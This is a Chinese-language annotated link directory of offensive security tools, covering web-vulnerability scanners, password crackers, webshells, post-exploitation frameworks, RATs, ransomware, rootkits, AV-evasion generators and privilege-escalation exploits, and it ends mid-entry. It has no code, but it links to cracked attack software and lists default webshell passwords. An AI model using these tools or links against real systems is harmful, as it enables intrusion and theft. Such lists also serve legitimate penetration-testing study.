https://github.com/WMJonssen/Centcount-Analytics PHP.数据库mysql/redis,网站分析软件,支持浏览器指纹、事件追踪、鼠标轨迹 - https://github.com/ticarpi/jwt_tool PY.json web token的检测 - https://github.com/dienuet/crossdomain PY.CORS(Cross-Origin Resource Sharing, 跨域资源共享)漏洞扫描器,支持读取aquatone结果,绕过origin安全设置。 - https://github.com/chenjj/CORScanner PY.CORS域配置错误,跨域解析漏洞扫描器。 - https://www.jianjunchen.com/post/cors安全部署最佳实践/ intro。CORScanner - https://www.anquanke.com/post/id/152339 JSONP和CORS跨站跨域读取资源的漏洞利用(附带EXP)。JSON Hijacking实战利用多种利用方式 - https://github.com/MagicZer0/fastjson-rce-exploit JAVA.阿里fastjson RCE, 绕过autotype机制,1.2.47以下版本。jndi利用方式。 ### CSRF跨站请求伪造利用 - https://www.owasp.org/index.php/File:CSRFTester-1.0.zip java.csrf验证工具 - https://github.com/d0nutptr/sic RUST.CSS注入,csrf攻击 - https://github.com/UltimateHackers/Blazy 支持测试 CSRF, Clickjacking, Cloudflare and WAF的弱口令探测器 ### SSRF服务端请求伪造 - https://github.com/swisskyrepo/SSRFmap 检测ssrf漏洞 - https://github.com/tarunkant/Gopherus PY.利用gopher协议生成ssrf payload执行rce。 ### XSS跨站脚本检测利用 - https://github.com/UltimateHackers/AwesomeXSS XSS Awesome系列 - http://www.xss-payloads.com 很全面的xss工具包与资料 - https://github.com/ismailtasdelen/xss-payload-list XSS 漏洞Payload列表 - https://github.com/NytroRST/XSSFuzzer 根据特定标签生成xss payload - https://github.com/evilcos/xssor2 余弦写的xss利用辅助工具 - https://github.com/UltimateHackers/XSStrike 可识别并绕过WAF的XSS扫描工具 - https://github.com/raz-varren/xsshell GO.利用xss返回js交互shell - https://github.com/UltimateHackers/JShell 利用xss返回js交互shell - https://github.com/shawarkhanethicalhacker/BruteXSS 一款XSS扫描器,可暴力注入参数 - https://github.com/1N3/XSSTracer 小型XSS扫描器,也可检测CRLF、XSS、点击劫持的 - https://github.com/0x584A/fuzzXssPHP PHP版本的反射型xss扫描 - https://github.com/chuhades/xss_scan 批量扫描XSS的python脚本 - https://github.com/BlackHole1/autoFindXssAndCsrf 自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件 - https://github.com/shogunlab/shuriken 使用命令行进行XSS批量检测 - https://github.com/stamparm/DSXS 支持GET、POST方式的高效XSS扫描器 - https://github.com/bsmali4/xssfork kali下无法使用的话,请下载正确的PhantomJS到目录thirdparty/phantomjs/Linux - https://github.com/riusksk/FlashScanner flash xss扫描 - https://github.com/Damian89/xssfinder 针对检测网站中的反射XSS ### XSS漏洞利用平台框架 - https://github.com/beefproject/beef JS,RUBY.BeEF跨平台Web浏览器渗透测试工具 - https://github.com/BlackHole1/WebRtcXSS PHP.基于thinkphp框架,利用webrtc进行自动化XSS入侵内网平台 - https://github.com/samdenty99/injectify TS,JS.利用xss在网站执行mitm攻击 - https://github.com/firesunCN/BlueLotus_XSSReceiver JS,PHP.蓝莲花战队XSS数据接收平台(无SQL版).GOODJOB. - https://github.com/euphrat1ca/XssPowerByTools PHP.XSS平台课程设计。simple。 - https://github.com/AntSwordProject/ant Nodejs.蚁逅@1.0,实时上线的 XSS 盲打平台 ### 本地文件包含漏洞 - https://github.com/hvqzao/liffy 本地文件包含漏洞利用工具 - https://github.com/D35m0nd142/Kadabra 本地文件包含漏洞扫描和利用工具 - https://github.com/P0cL4bs/Kadimus 本地文件包含漏洞扫描和利用工具 - https://github.com/D35m0nd142/LFISuite 本地文件包含漏洞利用及扫描工具,支持反弹shell - https://github.com/OsandaMalith/LFiFreak 本地文件包含漏洞利用及扫描工具,支持反弹shell ### 上传漏洞利用 - https://github.com/UltimateHackers/Arjun 扫描网页, 使用正则表达式爆破查找隐藏的GET/POST参数 - https://github.com/3xp10it/xupload 用于自动测试上传功能是否可上传webshell的工具 - https://github.com/gunnerstahl/JQShell PY3.CVE-2018-9206 jQuery File Upload利用工具 - https://github.com/destine21/ZIPFileRaider burp插件,测试zip文件上传漏洞 - https://github.com/jpiechowka/zip-shotgun PY.测试zip文件上传漏洞 ### 数据库利用/扫描/爆破 - https://github.com/sqlmapproject/sqlmap PY.sql注入sqlmap.GREATJOB.15K. - https://sinister.ly/Thread-SQLi-Dumper-v-8-5-crack SQLi Dumper数据库注入批量扫描自动化注入利用工具。GoodJob - https://github.com/ron190/jsql-injection Java.SQL注入工具.GOODJOB - https://github.com/shack2/SuperSQLInjectionV1 C#.安恒航牛的超级SQL注入工具【SSQLInjection】.GOODJOB - https://www.52pojie.cn/thread-80225-1-1.html Pangolin Professinal Edition 3.2.4.1132 CracKed By Hmily[LCG]。白帽汇NOSEC的注入工具,虽然NoUpdate但历史感。 - https://www.52pojie.cn/forum.php?mod=viewthread&tid=103057 Havij v1.151 Pro CracKed By Hmily[LCG]。印度ITSecTeam编写的sql注入工具,虽然NoUpdate但历史感。 - https://github.com/stamparm/DSSS PY3.SIMPLE,DONE,用99行代码实现的sql注入漏洞扫描器 - https://github.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper PHP. - https://sinister.ly/Thread-SQLi-Dumper-v-8-5-crack 基于搜索引擎的批量SQL注入漏洞扫描器。界面化历史感。 - https://github.com/Hadesy2k/sqliv PY2.SIMPLE,DONE,基于搜索引擎的批量SQL注入漏洞扫描器 - https://github.com/quentinhardy/odat 针对Oracle渗透的很全面的工具 - https://github.com/m8r0wn/enumdb MySQL和MSSQL利用工具后期爆破、搜索数据库并提取敏感信息。 - https://github.com/LoRexxar/Feigong 针对各种情况自由变化的MySQL注入脚本 - https://github.com/youngyangyang04/NoSQLAttack 一款针对mongoDB的攻击工具 - https://github.com/Neohapsis/bbqsql SQL盲注利用框架 - https://github.com/NetSPI/PowerUpSQL 基于Powershell,的sqlserver测试框架 - http://www.4hou.com/system/14950.html 基于Powershell,利用PowerUpSQL,渗透测试技巧:绕过SQL Server登录触发器限制 - https://github.com/stampery/mongoaudit MongoDB审计及渗透工具 - https://github.com/torque59/Nosql-Exploitation-Framework NoSQL扫描/爆破工具 - https://github.com/missDronio/blindy MySQL盲注爆破工具 - https://github.com/JohnTroony/Blisqy PY.用于http header中的时间盲注爆破工具,仅针对MySQL/MariaDB - https://github.com/se55i0n/DBScanner PY2.扫描常见sql、no-sql数据库资产,进行未授权访问和弱口令检测。simple - https://github.com/Turr0n/firebase 对没有正确配置的firebase数据库进行利用 - https://studio3t.com/download MongoDB扫描与连接工具 - https://github.com/bambish/ScanQLi PY3.SQLI漏洞探测工具,不包含利用。simple ### 口令扫描密码爆破证书验证 - https://github.com/vanhauser-thc/thc-hydra C.支持多种协议方式的破解与爆破 - https://github.com/maaaaz/thc-hydra-windows C.hydra的windows编译版本 - https://github.com/galkan/crowbar PY.支持openvpn、rdp、ssh、vnc破解 - https://github.com/shack2/SNETCracker C#.密码爆破工具,支持SSH、RDP、MySQL等常见协议.超级弱口令爆破工具 - https://github.com/jmk-foofus/medusa C.Linux下登录密码爆破工具 - https://github.com/nmap/ncrack C.支持多种协议的破解与爆破 - https://github.com/lanjelot/patator 支持多种协议的爆破,采用模块化设计,使用灵活 - https://github.com/euphrat1ca/F-Scrack PY2.对各类服务用户名密码爆破的脚本.ysrc - https://github.com/netxfly/crack_ssh GO.协程版ssh\redis\mongodb弱口令破解 - https://github.com/ztgrace/changeme 弱口令扫描器,不仅支持普通登录页,也支持ssh、mongodb等组件 - https://github.com/m4ll0k/SMBrute 利用smb服务进行用户名密码爆破 - https://github.com/TunisianEagles/SocialBox 针对fb、gmail、ins、twitter的用户名密码爆破的脚本 - https://github.com/Moham3dRiahi/XBruteForcer WordPress、Joomla、DruPal、OpenCart、Magento等CMS用户密码爆破 - https://github.com/lijiejie/htpwdScan PY.simple,http暴力破解、撞库攻击脚本 - https://github.com/galkan/crowbar PY.利用key对ssh、rdp、openvpn、vnc爆破 - https://github.com/scu-igroup/ssh-scanner NMAP,HYDRA.ssh批量爆破 - https://github.com/shengqi158/weak_password_detect NMAP.Linux下多线程探测ssh弱口令 ### 在线密码破解 - https://www.cmd5.com/ HASH密码在线破解。限制位数 - https://hashkiller.co.uk/Cracker 密码破解。Google reCAPTCHA v3。 - http://hashtoolkit.com HASH密码在线破解。免费 - http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php md5密码破解。免费 - https://md5.gromweb.com/?md5= md5密码破解。免费 - http://www.chamd5.org md5密码破解。需要登录 - http://www.xmd5.org md5密码破解。需要登录 - http://pmd5.com md5密码破解。需要验证码 - https://www.onlinehashcrack.com md5密码破解。需要验证码 ### 密码破解还原 - https://securityxploded.com/download.php 各种密码方向安全小工具 - https://github.com/bdutro/ibm_pw_clear IBM x3550/x3560 M3 bios密码清除重置工具 - https://github.com/thehappydinoa/iOSRestrictionBruteForce PY.实现的 ios 访问限制密码破解工具 - https://github.com/hashcat/hashcat C.哈希破解 - https://github.com/fireeye/gocrack GO.基于hashcat 3.6.0+的分布式密码破解工具 - https://github.com/s3inlc/hashtopolis php.hashcat的分布式破解工具,支持C#与python客户端 - https://github.com/chris408/known_hosts-hashcat PY.利用hashcat破解ssh密码hash - https://github.com/e-ago/bitcracker 首款开源的BitLocker密码破解工具 - https://www.ru.nl/publish/pages/909282/draft-paper.pdf INTRO.破解SSD下使用BitLocker加密 - https://github.com/magnumripper/JohnTheRipper 已知密文的情况下尝试破解出明文的破解密码软件 - https://github.com/shinnok/johnny JohnTheRipper密码破解的GUI界面,理论兼容所有功能,有windows界面 - https://github.com/MrSqar-Ye/wpCrack wordpress hash破解 - https://github.com/testsecer/Md5Decrypt C#.md5多接口查询基于网上web API的MD5搜索工具 - https://github.com/s0md3v/Hash-Buster 能调用多个API进行hash破解查询的智能工具 - https://www.52pojie.cn/thread-275945-1-1.html ARCHPR Pro4.54绿色中文破解版。压缩包密码破解,利用“已知明文攻击”破解加密的压缩文件 - https://github.com/fox-it/adconnectdump PY.Azure AD凭证导出工具 - https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password Navicate数据库密码解密 - https://github.com/psypanda/hashID PY.对超过220种hash识别。使用'hash' - https://github.com/AnimeshShaw/Hash-Algorithm-Identifier PY2.对超过160种hash识别。 - https://github.com/clr2of8/DPAT PY.利用hashcat等工具域密码进行破解测试 ### 网站管理WebShell - http://www.bt.cn 宝塔网站管理系统 - https://github.com/AntSwordProject/antSword js.基于Electron中国蚁剑,插件式开发。1.5k。greatjob。 - https://github.com/Chora10/Cknife/pulls JAVA.G:SecQuanCknife;gitee.com/9199771/cknife。2K。GOODJOB。 - https://github.com/euphrat1ca/hatchet C++.中国大砍刀 - https://github.com/tengzhangchao/PyCmd PY.一句话木马客户端程序,目前支持php、jsp,CS端通信加密 - https://github.com/epinna/weevely3 PY.利用特定的一句话脚本对网站进行管理 - https://github.com/nil0x42/phpsploit PY3.利用特定的一句话脚本对网站进行管理 - https://github.com/wonderqs/Blade PY.利用特定的一句话脚本对网站进行管理 - https://github.com/anestisb/WeBaCoo perl.利用特定的一句话脚本对网站进行管理 - https://github.com/keepwn/Altman .Net,mono.跨平台菜刀 - https://github.com/euphrat1ca/Behinder JAVA6.rebeyond“冰蝎”动态二进制加密网站管理客户端 - https://xz.aliyun.com/t/2744 intro.“冰蝎”利用动态二进制加密实现新型一句话木马之Java篇,木马之.NET篇,木马之PHP篇,木马之客户端篇。 - https://github.com/yzddmr6/webshell-venom PY.免杀webshell无限生成工具 - https://github.com/UltimateHackers/nano php.一句话,附带py编写的生成器 - https://github.com/antonioCoco/SharPyShell ASP.NET.webshell for C# web applications - https://github.com/k4mpr3t/b4tm4n PHP.可以伪造邮件、ddos,bat.php的webshell,初始k4mpr3t - https://github.com/dotcppfile/DAws PHP.过防火墙webshell,post pass=DAws - https://github.com/b374k/b374k php.网站管理,默认密码b374k - https://github.com/wso-shell/WSO PHP.webshell的文件管理,可以伪装为404界面 - https://github.com/rebeyond/memShell JAVA.一款可以写入java web server内存中的无文件webshell - https://github.com/DXkite/freebuf-stream-shell PHP.使用流包装器实现WebShell。freebuf介绍。 # 后渗透拓展 - https://github.com/rapid7/metasploit-framework RUBY.后渗透框架。17k。greatjob。 - https://github.com/EmpireProject/Empire PS.后渗透命令执行框架。PowerView。4.5k。greatjob。 - https://github.com/PowerShellMafia/PowerSploit PS.测试脚本集与开发框架。AntivirusBypass寻找反病毒特征码,CodeExecution注入DLL脚本,Exfiltration隐私记录,Mayhem破坏,Persistence权限维持,Privesc提权,Recon信息收集,ScriptModification编码加密。PowerView。5.4k。goodjob。 - https://github.com/samratashok/nishang PS.测试脚本集与开发框架。Check-VM检查虚拟机;Copy-VSS利用Volume Shadow Copy 服务来复制出SAM文件(密码);Invoke-CredentialsPhish欺骗用户输入账号密码信息;FireBuster FireListener对内网进行扫描;Get-Information信息收集。3k。goodjob - https://github.com/SecureAuthCorp/impacket Python工具包。Impacket是用于处理网络协议的,内网中可用以提权例如wmiexec.py、NMB,SMB1-3和MS-DCERPC提供对协议实现本身的低级别编程访问。3.3K。greatjob。 - https://github.com/maaaaz/impacket-examples-windows Impacket打包exe版 - https://github.com/byt3bl33d3r/CrackMapExec PY/PS.利用AD内置功能/协议规避大多数终端防护/IDS/IPS.包含impacket、PowerSploit等多种模块.3K。goodjob。 - https://github.com/SpiderLabs/scavenger CrackMapExec二次包装开发,内网敏感信息扫描 - https://github.com/jmortega/python-pentesting python-pentesting-tool,python安全工具相关 - https://github.com/0xdea/tactical-exploitation Python/PowerShell的测试脚本集 - https://github.com/PowerShellEmpire/PowerTools PowerShell脚本集.NoUpdate - https://github.com/FuzzySecurity/PowerShell-Suite PowerShell脚本集.NoUpdate - https://github.com/rvrsh3ll/Misc-Powershell-Scripts PowerShell脚本集 - https://github.com/TheSecondSun/Bashark Bash.后渗透框架。大鲨鱼 - https://github.com/JoelGMSec/AutoRDPwn PS4.远程桌面利用访问 - https://github.com/JusticeRage/FFM PY3.拥有下载、上传功能,生成可执行py脚本的后门的后渗透框架 - https://github.com/DarkSpiritz/DarkSpiritz PY2.后渗透框架 - https://github.com/xorrior/RemoteRecon 基于DotNetToJScript进行截图、key记录、token窃取、dll与恶意代码注入 - https://github.com/0xwindows/VulScritp 内网渗透脚本,包括banner扫描、端口扫描;phpmyadmin、jenkins等通用漏洞利用等 - https://github.com/zMarch/Orc bash.Linux下后渗透命令集合 ### 后渗透信息收集白利用 - https://github.com/securemode/DefenderKeys 枚举出被 Windows Defender 排除扫描的配置 - https://github.com/BloodHoundAD/BloodHound PS.使用图论进行内网信息域内关系与细节整理,作为DEFCON 24的免费开源工具发布。通过脚本导出域内的session、computer、group、user等信息,入库后进行可视化分析域成员和用用户关系。 - https://www.4hou.com/penetration/5752.html INTRO.域渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍 - https://github.com/m8r0wn/nullinux 用于Linux的内部渗透测试工具,可用于通过SMB枚举操作系统信息,域信息,共享,目录和用户。 - https://github.com/fdiskyou/hunter C++.调用 Windows API 对内网信息进行搜集很全面 - https://github.com/lcatro/network_backdoor_scanner C++.反向链接、内外网穿透、通信数据加密、弱口令。 - https://github.com/sowish/LNScan 详细的内部网络信息扫描器 ### 横向移动与密码hash窃取 - http://www.oxid.it/cain.html Cain & Abel支持密码还原、arp中间人攻击.NoUpdate。 - https://github.com/gentilkiwi/mimikatz C.Windows下进行凭证抓取横向移动 - https://github.com/skelsec/pypykatz PY3.使用python实现的mimikatz - https://github.com/eladshamir/Internal-Monologue C#.无需LSASS进程使用Mimikatz从LSASS进程内存中提取内容,从内存中提取明文密码,NTLM哈希,Kerberos ticket,以及执行pass-the-hash/pass-the-ticket攻击等 - https://github.com/nccgroup/redsnarf PS,PY.调用猕猴桃等程序窃取哈希,密码解密,rdp多方法利用,远程启动shell,清除痕迹 - https://github.com/twelvesec/passcat C.Windows 下密码抓取工具 - https://github.com/huntergregal/mimipenguin C.linux密码抓取 - https://github.com/AlessandroZ/LaZagne py3.跨平台密码抓取工具。在win下,V2.4相较于V2.3抓取到的内容会少一些 - https://github.com/AlessandroZ/LaZagneForensic LaZagne密码破解升级版,利用DPAPI,目前缺陷是需要windows user密码 - https://github.com/putterpanda/mimikittenz PS.类似lazagne可以获取用户级密码。利用"ReadProcessMemory()"方法从目标进程中提取纯文本密码。 - https://github.com/quarkslab/quarkspwdump quarkslab出品的密码抓取工具,不用注入任何进程 - https://github.com/mthbernardes/sshLooter 从ssh服务中窃取用户名密码 - https://github.com/nettitude/Invoke-PowerThIEf 利用IE进行后渗透,抓取密码、重定向等 - https://github.com/GhostPack/Rubeus 操作Kerberos的库, 实现了Kekeo的大部分功能, C#编写 - https://github.com/m8r0wn/ldap_search PY.通过ldap(轻量目录访问协议)认证,列举win域信息,爆破登录 ### 远程管理控制 - https://github.com/malwaredllc/byob 僵尸网络生成框架 - https://github.com/panda-re/lava 大规模向程序中植入恶意程序 - https://github.com/proxycannon/proxycannon-ng 构建攻击僵尸网络 - https://github.com/deadPix3l/CryptSky/ 勒索软件 - https://github.com/jgamblin/Mirai-Source-Code C.MIRAI蠕虫病毒.6K. - https://github.com/NYAN-x-CAT/Lime-RAT VB。勒索病毒 - https://github.com/The404Hacking/AndroRAT JAVA.Android平台一对多带界面。 - https://github.com/AhMyth/AhMyth-Android-RAT Smali,Android平台一对多带界面。 - https://coding.net/u/ssooking/p/cobaltstrike-cracked/git java1.8.cobalt strike是一个APT协同工作平台 - https://github.com/BlackHacker511/BlackRAT JAVA.跨平台 - https://github.com/Coalfire-Research/Slackor GO,PY3.基于slack框架命令控制,利用dns服务通讯。集成spookflare/impacket/pypykatz。simple。goodjob。 - https://github.com/tiagorlampert/CHAOS GO.win远控,可过大部分杀软 - https://github.com/Ne0nd0g/merlin GO.c2通讯,多session - https://github.com/0x09AL/Browser-C2 GO.利用chrome以浏览器的形式连接C2服务器 - https://github.com/Tiked/Client GO.Windows, OS X and linux RAT client - https://github.com/xdnice/PCShare C++.远程控制软件,可以监视目标机器屏幕、注册表、文件系统等。0.2k。 - https://github.com/quasar/QuasarRAT C#.一对多,界面。goodjob。2.4k。 - https://github.com/TheM4hd1/Vayne-RaT C#.一对多,界面 - https://github.com/TheSph1nx/RT-101 C#.一对多,界面 - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp C#.一对多,界面 - https://github.com/DannyTheSloth/VanillaRat C#.SIMPLE,界面 - https://github.com/brunull/pace C#.SIMPLE,界面 - https://github.com/5alt/ZeroRAT powershell.windows上的一句话远控,只需要执行一条指令不需要写文件 - https://github.com/nettitude/PoshC2 PowerShell\C#.远控工具,有win提权组件 - https://github.com/mwsrc/njRAT VB.源码 - https://github.com/euphrat1ca/njRAT-v0.7d vb.常见蠕虫远控,有很多变种,多session带界面 - https://github.com/peterpt/fuzzbunch PY2.方程式NSA漏洞利用远控RAT,配有自动化安装脚本与gui界面。永恒之蓝、永恒浪漫、永恒冠军、双星脉冲 - https://github.com/n1nj4sec/pupy PY.Windows, Linux, OSX, Android跨平台,多session。groodjob。4.7k。 - https://github.com/nathanlopez/Stitch PY.Windows、Mac OSX、Linux跨平台。goodjob。1.3k。 - https://github.com/zerosum0x0/koadic PY3.大宝剑利用JScript/VBScript 进行控制,在内存中运行shell.GOODJOB。1.2K。 - https://github.com/Ridter/MyJSRat PY2.利用js后门,配合chm、hta可实现很多后门方式。evi1cg.me/archives/chm_backdoor.html - https://github.com/Hood3dRob1n/JSRat-Py PY.jsrat改进版 - https://github.com/its-a-feature/Apfell PY3.macOS与linux下的利用js后门,web界面管理 - https://github.com/neoneggplant/EggShell PY.macos/osx远控,可生成HID代码,多session - https://github.com/Marten4n6/EvilOSX PY.macos/osx远控,多session - https://github.com/Mr-Un1k0d3r/ThunderShell PY2.CLI与web端,内存马,RC4加密HTTP传输 - https://github.com/vesche/basicRAT PY3.simple远控,多session - https://github.com/Viralmaniar/Powershell-RAT PY.截图通过gmail传输 - https://github.com/byt3bl33d3r/gcat PY.使用 gmail 作为 C&C 服务器 - https://github.com/sweetsoftware/Ares PY.c2通讯,支持代理功能 - https://github.com/mvrozanti/RAT-via-Telegram PY.利用telegram,windows下的远程控制工具 - https://github.com/micle-fm/Parat PY.利用telegram,windows下的远程控制工具 - https://github.com/ahhh/Reverse_DNS_Shell PY.通过dns传输 - https://github.com/deepzec/Grok-backdoor PY.利用ngrok的后门 - https://github.com/trustedsec/trevorc2 PY.搭建一个合法的网站(可浏览),用于隐藏命令执行的客户端/服务器通信 - https://github.com/iagox86/dnscat2 RUBY/C.cs结构,利用DNS协议进行端对端传输 ### shell反弹rootkit生成 - https://github.com/sysdream/chashell Golang。利用dns反弹shell - https://github.com/WangYihang/Platypus GO.反弹shell管理工具 - https://github.com/FlyfishSec/rsGen BAT.Windows下远程反弹shell命令行工具 - https://github.com/sensepost/DNS-Shell PY.本地利用53端口nslookup传输加密的ps命令,回弹shell - https://github.com/GuestGuri/Rootkit PY.反弹一个tcp连接,将进程id绑定到一个空文件夹 - https://github.com/f0rb1dd3n/Reptile C.LKM Linux rootkit。1k。 - https://github.com/islamTaha12/Python-Rootkit PY.windows下rootkit远控,反弹meterpreter - https://github.com/mhaskar/Linux-Root-Kit PY.simple。linux简单rootkit - https://github.com/PinkP4nther/Sutekh C.rootkit使普通用户获取root shell - https://github.com/tokyoneon/Armor bash.生成加密 Payload 在 macOS 上反弹 Shell - https://github.com/DamonMohammadbagher/NativePayload_ARP C#.利用arp协议传输后门 ## 后门生成与混淆免杀 - https://github.com/Screetsec/Vegile SHELL,C.msf免杀,程序注入 - https://github.com/MohamedNourTN/Terminator PY2.msf免杀 - https://github.com/Veil-Framework/Veil PY.Msf免杀。1.5K。 - https://github.com/abedalqaderswedan1/aswcrypter py,bash.msf免杀 - https://github.com/Screetsec/TheFatRat JAVA.msf免杀,利用searchsploit快速搜索 - https://github.com/pasahitz/zirikatu msf免杀 - https://github.com/govolution/avet msf免杀 - https://github.com/GreatSCT/GreatSCT msf免杀 - https://github.com/EgeBalci/HERCULES msf免杀 - https://github.com/trustedsec/nps_payload msf免杀 - https://github.com/hlldz/SpookFlare PY.客户端与网络端策略绕过,msf/empire/koadic生成加载混淆免杀。goodjob。 - https://github.com/n00py/Hwacha linux下快速生成metepreter等多种payload - https://github.com/4w4k3/Insanity-Framework PY.生成免杀payload,识别虚拟机,钓鱼,内存注入等 - https://github.com/trustedsec/unicorn PY.一键生成多种后门 - https://github.com/Kkevsterrr/backdoorme py3、py2。多种类型的后门、shell生成工具,可以自动维持权限 - https://github.com/pasahitz/regsvr32 C#.使用C#+Empire实现最小体积免杀后门 - https://github.com/Cn33liz/StarFighters 基于DotNetToJScript,利用JavaScript和VBScript执行Empire Launcher - https://github.com/mdsecactivebreach/SharpShooter 基于DotNetToJScript使用js、vbs,用于检索和执行任意CSharp源码的payload创建框架 - https://github.com/mdsecactivebreach/CACTUSTORCH 基于DotNetToJScript使用js、vbs生成恶意payload - https://github.com/OmerYa/Invisi-Shell 对powershell文件进行混淆 - https://github.com/danielbohannon/Invoke-DOSfuscation 对powershell文件进行混淆,加密操作以及重新编码 - https://github.com/danielbohannon/Invoke-Obfuscation 对powershell文件进行混淆,加密操作以及重新编码 - https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator VBA.宏混淆,其中还包括AV/Sandboxes逃避机制 - https://github.com/9aylas/Shortcut-Payload-Generator 快捷方式(.lnk)文件Payload生成器.AutoIt编写 ### 劫持注入权限绕过 - https://github.com/hfiref0x/UACME 包含许多用于多个版本操作系统上绕过Windows用户帐户控制的方法 - https://payloads.online/archivers/2018-12-22/1 DLL Hijacking & COM Hijacking ByPass UAC - 议题解读。倾旋 - https://github.com/rootm0s/WinPwnage PY2.win下权限提升,uac绕过,dll注入等 - https://github.com/NYAN-x-CAT/Disable-Windows-Defender C#.Changing values to bypass windows defender - https://github.com/stephenfewer/ReflectiveDLLInjection C.一种库注入技术,让DLL自身不使用LoadLibraryA函数,将自身映射到目标进程内存中 - https://github.com/lmacken/pyrasite PY3.对运行中dpython进程注入,支持≥py2.4 - https://github.com/tyranid/DotNetToJScript C#.能够利用JS/Vbs脚本加载.Net程序的工具 - https://github.com/Ben0xA/nps C#.实现不调用powershell.exe执行powershell命令 - https://github.com/Mr-Un1k0d3r/PowerLessShell PY.实现不调用powershell.exe执行powershell命令 - https://github.com/p3nt4/PowerShdll 使用rundll32运行PowerShell,绕过软件限制 - https://github.com/ionescu007/r0ak 内核层的瑞士军刀. 在Windows10内核中读/写/执行代码 - https://github.com/leechristensen/UnmanagedPowerShell 从非托管程序执行PowerShell,支持进程注入 - https://github.com/D4Vinci/PasteJacker 剪贴板劫持利用工具 - https://github.com/ChrisAD/ads-payload 利用环境变量与destop.ini绕过windows下的Palo Alto Traps endpoint 防护软件 - https://github.com/malcomvetter/UnstoppableService C#.将自身安装为Windows服务且管理员无法停止/暂停服务的程序. - https://github.com/threatexpress/metatwin 从一个文件中提取元数据,包括数字签名,并注入到另一个文件中 - https://github.com/Mr-Un1k0d3r/Windows-SignedBinary 可以修改二进制文件的HASH,同时保留微软windows的签名 - https://github.com/secretsquirrel/SigThief PY.用于劫持合法的数字签名并绕过Windows的哈希验证机制的脚本工具 - https://github.com/g3rzi/Manifesto C#.寻找系统中存在可执行权限的组件 - https://github.com/ufrisk/MemProcFS C.以访问文件系统的方式访问物理内存,可读写,有易于使用的接口. 当前支持Windows - https://github.com/LOLBAS-Project/LOLBAS Windows系统白利用工具集 - https://github.com/mdsecactivebreach/SharpPack C#.绕过系统应用白名单执行DotNet and PowerShell tools - https://github.com/mdsecactivebreach/RDPInception/ BAT.rdp服务劫持,利用ps反弹shell - https://github.com/gianlucaborello/libprocesshider C.利用 LD_PRELOAD 来实现系统函数的劫持,在linux 下隐藏进程 - https://www.cnblogs.com/mysgk/p/9602977.html INTRO.linux 下隐藏进程的一种方法。利用libprocesshider - https://github.com/M00nRise/ProcessHider C++.Windows下隐藏进程 ### shellcode相关 - https://www.shellterproject.com shellter是一款的动态Shellcode注入工具。商业版 - https://github.com/r00t-3xp10it/venom linux下metasploit Shellcode generator/compiller。Unix/Win/Web/Apk/IOS/MSoffice多种类型生成 - https://github.com/secretsquirrel/the-backdoor-factory PY,C.后门程序shellcode生成,dll程序劫持。NoUpdate - https://github.com/DimopoulosElias/SimpleShellcodeInjector C.以十六进制的方式执行shellcode,绕过杀软。 - https://github.com/clinicallyinane/shellcode_launcher/ C++.加载shellcode方式的payload到内存 - https://github.com/Zer0Mem0ry/RunPE C++.通过内存读取,网络传输内容,利用PE执行shellcode - https://github.com/brimstone/go-shellcode GO.加载载荷到内存 - https://github.com/TheWover/donut C.将.Net程序集生成shellcode并以内存的形式加载运行 - https://github.com/Mr-Un1k0d3r/DKMC Don’t kill my cat.生成混淆的shellcode,将shellcode存储在多语言图像中 - https://github.com/Rvn0xsy/Cooolis-ms PY.Cooolis-ms 是一个支持Metasploit Framework RPC的一个服务端,用于给Shellcode和PE加载器工作,在一定程度上绕过反病毒软件的静态查杀,同时可以让Cooolis-ms服务端与Metasploit服务器进行分离。 ## 提权相关 - https://github.com/AlessandroZ/BeRoot PY.通过检查常见的错误配置来查找提权方法. 支持Windows/Linux/Mac ### Linux提权相关 - https://github.com/rebootuser/LinEnum bash.Linux提权检测。2k。goodjob。 - https://github.com/mzet-/linux-exploit-suggester 查找linux哪些补丁没有打 - https://github.com/belane/linux-soft-exploit-suggester 查找linux那些软件有漏洞 - https://github.com/SecWiki/linux-kernel-exploits linux-kernel-exploits Linux平台提权漏洞集合 - https://guif.re/linuxeop linux提权命令集合 - https://github.com/mschwager/0wned PY.利用python包进行高权限用户创建 - https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs C.脏牛提权漏洞exp集合wiki。G:DirtyCow-EXP;dirtycow.ninja。2.3k。 - https://github.com/euphrat1ca/CVE-2016-5195 C++,GO.脏牛提权漏洞exp,Linux 平台 和 Android 平台。release。 - https://github.com/jas502n/CVE-2018-17182 Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182) - https://github.com/stanleyb0y/sushell 利用su小偷实现低权限用户窃取root用户口令 - https://github.com/jas502n/CVE-2018-17182/ Linux 内核VMA-UAF 提权漏洞 CVE-2018-17182 - https://github.com/jas502n/CVE-2018-14665 CVE-2018-14665,linux下Xorg X服务器提权利用 - https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897 Linux系统利用Syscall实现提权 - https://github.com/can1357/CVE-2018-8897 Linux系统利用Syscall实现提权 - https://github.com/nilotpalbiswas/Auto-Root-Exploit linux自动提权脚本 - https://github.com/WazeHell/PE-Linux Linux提权工具 ### Windows提利用相关 - http://www.fuzzysecurity.com/tutorials/16.html windows平台教程级提权参考文章 - https://github.com/bitsadmin/wesng PY.WES-NG,全称为Windows ExploitSuggester - Next Generation,该工具的运行基于Windows systeminfo实用工具的输出,可以给用户提供目标操作系统可能存在的漏洞列表,并针对这些漏洞给出漏洞利用实施建议。该工具的适用系统范围从Windows XP到Windows 10,还包括Windows Server等服务器/工作站版本。1k。 - https://github.com/rasta-mouse/Sherlock PS.win提权漏洞验证。1k。 - https://github.com/SecWiki/windows-kernel-exploits Windows平台提权漏洞Exp集合 - https://github.com/51x/WHP windows下各种提权与利用工具 - https://github.com/WindowsExploits/Exploits 微软CVE-2012-0217、CVE-2016-3309、CVE-2016-3371、CVE-2016-7255、CVE-2017-0213提权利用 - https://github.com/SandboxEscaper/polarbearrepo C++.Win 10计划任务本地权限提升、win server 2016-2019提权 - https://github.com/breenmachine/RottenPotatoNG C++.CVE漏洞编号:CVE-2016-3225,烂土豆ms16-075利用NBNS本地域名欺骗和WPAD代理欺骗提权 - https://github.com/decoder-it/lonelypotato 